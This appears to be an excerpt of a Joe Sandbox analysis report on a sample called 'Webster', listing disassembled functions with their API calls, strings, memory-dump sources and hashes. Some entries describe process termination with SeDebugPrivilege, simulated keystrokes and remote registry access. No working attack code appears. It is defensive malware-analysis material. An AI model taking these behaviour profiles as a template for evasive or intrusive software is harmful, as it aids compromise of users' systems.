                                                                                  • Opcode ID: db94134c6f2979e76a1f3f4b333ca3190144b83ebf3f8186c0f914f30dadd11f
                                                                                  • Instruction ID: 0f8ceed797422cda88fcb1f5d197956fbc519d2da0b63cc4228659406911557c
                                                                                  • Opcode Fuzzy Hash: db94134c6f2979e76a1f3f4b333ca3190144b83ebf3f8186c0f914f30dadd11f
                                                                                  • Instruction Fuzzy Hash: C55185B24083859BC724EBA5D9819DFB3EC9F85340F50491EF289C7192EF74E688C756
                                                                                  Function 00B08C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B08D24
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: InvalidateRect
                                                                                  • String ID:
                                                                                  • API String ID: 634782764-0
                                                                                  • Opcode ID: 4b485447003d344c02117d690c30a3de71466c06a817b9c574b2f4f7c79b2ff6
                                                                                  • Instruction ID: fd92ffadbe74dda781c8b52993d75b3f925b655a19769331e040901af5bd9e93
                                                                                  • Opcode Fuzzy Hash: 4b485447003d344c02117d690c30a3de71466c06a817b9c574b2f4f7c79b2ff6
                                                                                  • Instruction Fuzzy Hash: 55519D30640204BFEB30AB24DC89BA93FE4EB15350F6446A5F595EB1E1CF71AA90DB60
                                                                                  Function 00A82F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00ABC638
                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00ABC65A
                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00ABC672
                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00ABC690
                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00ABC6B1
                                                                                  • DestroyIcon.USER32(00000000), ref: 00ABC6C0
                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00ABC6DD
                                                                                  • DestroyIcon.USER32(?), ref: 00ABC6EC
                                                                                    • Part of subcall function 00B0AAD4: DeleteObject.GDI32(00000000), ref: 00B0AB0D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                  • String ID:
                                                                                  • API String ID: 2819616528-0
                                                                                  • Opcode ID: d06c0561eda8701d820fb30043e420eeea572904e7689145943900ff2cef0e9a
                                                                                  • Instruction ID: 58ada71db408987c1d74797496b2e85620f89e8c3e5f0f1ee8f1cf0ffba1eebd
                                                                                  • Opcode Fuzzy Hash: d06c0561eda8701d820fb30043e420eeea572904e7689145943900ff2cef0e9a
                                                                                  • Instruction Fuzzy Hash: EA516974610209AFDB20EF25CD55FBA7BB9FB58720F104528F942D7290DBB0ADA0DB50
                                                                                  Function 00ADA226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00ADB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADB54D
                                                                                    • Part of subcall function 00ADB52D: GetCurrentThreadId.KERNEL32 ref: 00ADB554
                                                                                    • Part of subcall function 00ADB52D: AttachThreadInput.USER32(00000000,?,00ADA23B,?,00000001), ref: 00ADB55B
                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ADA246
                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00ADA263
                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00ADA266
                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ADA26F
                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00ADA28D
                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ADA290
                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ADA299
                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00ADA2B0
                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ADA2B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2014098862-0
                                                                                  • Opcode ID: 690a08fb50f7bcbdcab9f1e7a55296501c1deeae27f41284074409d41dec15f7
                                                                                  • Instruction ID: 08b532ea57f0d8a698d811d3734d2de27cde7e310e6cd4b1c9975ff6f53cb84a
                                                                                  • Opcode Fuzzy Hash: 690a08fb50f7bcbdcab9f1e7a55296501c1deeae27f41284074409d41dec15f7
                                                                                  • Instruction Fuzzy Hash: 0211E5B1560218BEF6106F619C49FAA3B2DEB4C750F514416F3416B1D0CEF35CA09AB0
                                                                                  Function 00AD94D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00AD915A,00000B00,?,?), ref: 00AD94E2
                                                                                  • HeapAlloc.KERNEL32(00000000,?,00AD915A,00000B00,?,?), ref: 00AD94E9
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AD915A,00000B00,?,?), ref: 00AD94FE
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00AD915A,00000B00,?,?), ref: 00AD9506
                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00AD915A,00000B00,?,?), ref: 00AD9509
                                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00AD915A,00000B00,?,?), ref: 00AD9519
                                                                                  • GetCurrentProcess.KERNEL32(00AD915A,00000000,?,00AD915A,00000B00,?,?), ref: 00AD9521
                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00AD915A,00000B00,?,?), ref: 00AD9524
                                                                                  • CreateThread.KERNEL32(00000000,00000000,00AD954A,00000000,00000000,00000000), ref: 00AD953E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 1957940570-0
                                                                                  • Opcode ID: b78b08f7e164e246164e6d6c7fcfce47170e74939587621da82640b5106aacfe
                                                                                  • Instruction ID: d456d717ab0480b24aa64196a63620ab91005d3844a10b90fcebc4ee7ce179a4
                                                                                  • Opcode Fuzzy Hash: b78b08f7e164e246164e6d6c7fcfce47170e74939587621da82640b5106aacfe
                                                                                  • Instruction Fuzzy Hash: 4D01C2B5250304BFE710AF65DC4DFA77B6CEB89711F408411FA05DB191CEB59854CB60
                                                                                  Function 00AFA20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                  • API String ID: 0-572801152
                                                                                  • Opcode ID: 0671ddde40db582e70fc76bd7fc14e592c7f490dad2f1ebbecad7dc2e973ca5c
                                                                                  • Instruction ID: 634605a488adac29df9a6cfa4bb66736dff66e0a4b3bd08137e597dcacb0260d
                                                                                  • Opcode Fuzzy Hash: 0671ddde40db582e70fc76bd7fc14e592c7f490dad2f1ebbecad7dc2e973ca5c
                                                                                  • Instruction Fuzzy Hash: 7DC190B1A0021E9FDF10DF98C884AFEB7F5BB58350F148569FA09AB280E770AD45CB51
                                                                                  Function 00AF97FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit$_memset
                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                  • API String ID: 2862541840-625585964
                                                                                  • Opcode ID: 21390e3c69688222603d9723b87a70a5c1fbae96eca3c7b563d0fcc617b4f312
                                                                                  • Instruction ID: 2a3bfe6b14dace3bce451bd912604f5ce61b25a3ea672288652ff615b7a62bd6
                                                                                  • Opcode Fuzzy Hash: 21390e3c69688222603d9723b87a70a5c1fbae96eca3c7b563d0fcc617b4f312
                                                                                  • Instruction Fuzzy Hash: C391AC31A00219ABDF24DFA5C884FAFBBB8EF85750F10855DF615AB290DB709945CFA0
                                                                                  Function 00B073A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B07449
                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00B0745D
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B07477
                                                                                  • _wcscat.LIBCMT ref: 00B074D2
                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B074E9
                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B07517
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                  • String ID: SysListView32
                                                                                  • API String ID: 307300125-78025650
                                                                                  • Opcode ID: 89a5db65e923cd1b715dfb8aacfa14c0414939bbc86f821612e6d3c81b69fd8f
                                                                                  • Instruction ID: 2a5752e40e3a375cd9656a09592df6612962578673488ea59cc66b76a78bd75c
                                                                                  • Opcode Fuzzy Hash: 89a5db65e923cd1b715dfb8aacfa14c0414939bbc86f821612e6d3c81b69fd8f
                                                                                  • Instruction Fuzzy Hash: BC418471944348AFEB219F64CC85BEEBBE8EF08350F10446AF945A72D1DB71AD84CB50
                                                                                  Function 00AFF01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AE4148: CreateToolhelp32Snapshot.KERNEL32 ref: 00AE416D
                                                                                    • Part of subcall function 00AE4148: Process32FirstW.KERNEL32(00000000,?), ref: 00AE417B
                                                                                    • Part of subcall function 00AE4148: FindCloseChangeNotification.KERNEL32(00000000), ref: 00AE4245
                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AFF08D
                                                                                  • GetLastError.KERNEL32 ref: 00AFF0A0
                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AFF0CF
                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AFF14C
                                                                                  • GetLastError.KERNEL32(00000000), ref: 00AFF157
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00AFF18C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                                                  • String ID: SeDebugPrivilege
                                                                                  • API String ID: 1701285019-2896544425
                                                                                  • Opcode ID: a0dd3e66a4c73f6b456d1761fbcef9b7f329de2c04bea948051cc4d58e7ba74b
                                                                                  • Instruction ID: 706132fc3647137f9300a9c1ed4c0571650cd282e724133cdd8e3b6029bc5c73
                                                                                  • Opcode Fuzzy Hash: a0dd3e66a4c73f6b456d1761fbcef9b7f329de2c04bea948051cc4d58e7ba74b
                                                                                  • Instruction Fuzzy Hash: 1941DC31200205AFDB25EF64CD96F7DB7A5AF84714F048129FA029F392DFB4A844CB89
                                                                                  Function 00AE34DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00AE357C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconLoad
                                                                                  • String ID: blank$info$question$stop$warning
                                                                                  • API String ID: 2457776203-404129466
                                                                                  • Opcode ID: 6c9fc1abf218faf4cd2d1aac0b00ca5464b48f8054779ae154a0aa9662311bdd
                                                                                  • Instruction ID: f7c4e2fd1aa69250ed085d11a0a2e951c707f667be0367bef04f72761a4595d6
                                                                                  • Opcode Fuzzy Hash: 6c9fc1abf218faf4cd2d1aac0b00ca5464b48f8054779ae154a0aa9662311bdd
                                                                                  • Instruction Fuzzy Hash: 4B11E773648786BEAF005B56DC96CAA77ECDF06760F20046AFA00A73C1E7A46F4056B0
                                                                                  Function 00AE47E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00AE4802
                                                                                  • LoadStringW.USER32(00000000), ref: 00AE4809
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AE481F
                                                                                  • LoadStringW.USER32(00000000), ref: 00AE4826
                                                                                  • _wprintf.LIBCMT ref: 00AE484C
                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AE486A
                                                                                  Strings
                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00AE4847
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                  • API String ID: 3648134473-3128320259
                                                                                  • Opcode ID: 91d75ab74b27f6dff3814e9af40e5b1f4da573ec480bed941b8481197d9fc558
                                                                                  • Instruction ID: 62f393965025b3bd26939ad8c7908ccfc71a3fae6e147a3947150712403a0726
                                                                                  • Opcode Fuzzy Hash: 91d75ab74b27f6dff3814e9af40e5b1f4da573ec480bed941b8481197d9fc558
                                                                                  • Instruction Fuzzy Hash: CB0162F29102487FE711ABA49D89EF6737CEB08301F804595B749E3041EEB49ED44B75
                                                                                  Function 00B0DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00B0DB42
                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00B0DB62
                                                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B0DD9D
                                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B0DDBB
                                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B0DDDC
                                                                                  • ShowWindow.USER32(00000003,00000000), ref: 00B0DDFB
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00B0DE20
                                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00B0DE43
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                  • String ID:
                                                                                  • API String ID: 1211466189-0
                                                                                  • Opcode ID: c5fcf92fa0b62be7b45513c7dc9c20860bdb5db7158ea4cd716632fea54b0bd4
                                                                                  • Instruction ID: 11abe4f4336f659226568049e7d6364c9905a41e4a96e80e1878c5dd31315c58
                                                                                  • Opcode Fuzzy Hash: c5fcf92fa0b62be7b45513c7dc9c20860bdb5db7158ea4cd716632fea54b0bd4
                                                                                  • Instruction Fuzzy Hash: 59B15731600215ABDF14CFA9C9C57A97BF1FF44711F0881A9EC489F2D5DB75A990CB90
                                                                                  Function 00B00371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00B0147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0044E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 3479070676-0
                                                                                  • Opcode ID: eeca22fb75758fa5bf3075cec5eb761019f1703ed4973df6bd6a74daa77f2526
                                                                                  • Instruction ID: 496e6432a89ac6b0507727335a6706db3aac23b0aa4a2ea9a26bb2e0b3c77c7d
                                                                                  • Opcode Fuzzy Hash: eeca22fb75758fa5bf3075cec5eb761019f1703ed4973df6bd6a74daa77f2526
                                                                                  • Instruction Fuzzy Hash: DAA18A30208201DFCB15EF64C885B6EBBE5EF88314F14895DF9969B2A2DB31E945CF42
                                                                                  Function 00A82E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ABC508,00000004,00000000,00000000,00000000), ref: 00A82E9F
                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00ABC508,00000004,00000000,00000000,00000000,000000FF), ref: 00A82EE7
                                                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00ABC508,00000004,00000000,00000000,00000000), ref: 00ABC55B
                                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ABC508,00000004,00000000,00000000,00000000), ref: 00ABC5C7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1268545403-0
                                                                                  • Opcode ID: 0c8633cd75e6db4fba437664f5a3ee0f33addd9f08850413a662b3057ce02c18
                                                                                  • Instruction ID: 65ac86f134413c2a040586d33fc693631744a20c25408288b90fb1484eb254d1
                                                                                  • Opcode Fuzzy Hash: 0c8633cd75e6db4fba437664f5a3ee0f33addd9f08850413a662b3057ce02c18
                                                                                  • Instruction Fuzzy Hash: AA412970618680AEDB35BB28CC88BBA7FE6BF91310F64891DE447575A1CB71B980DB14
                                                                                  Function 00AE7681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00AE7698
                                                                                    • Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
                                                                                    • Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031
                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00AE76CF
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00AE76EB
                                                                                  • _memmove.LIBCMT ref: 00AE7739
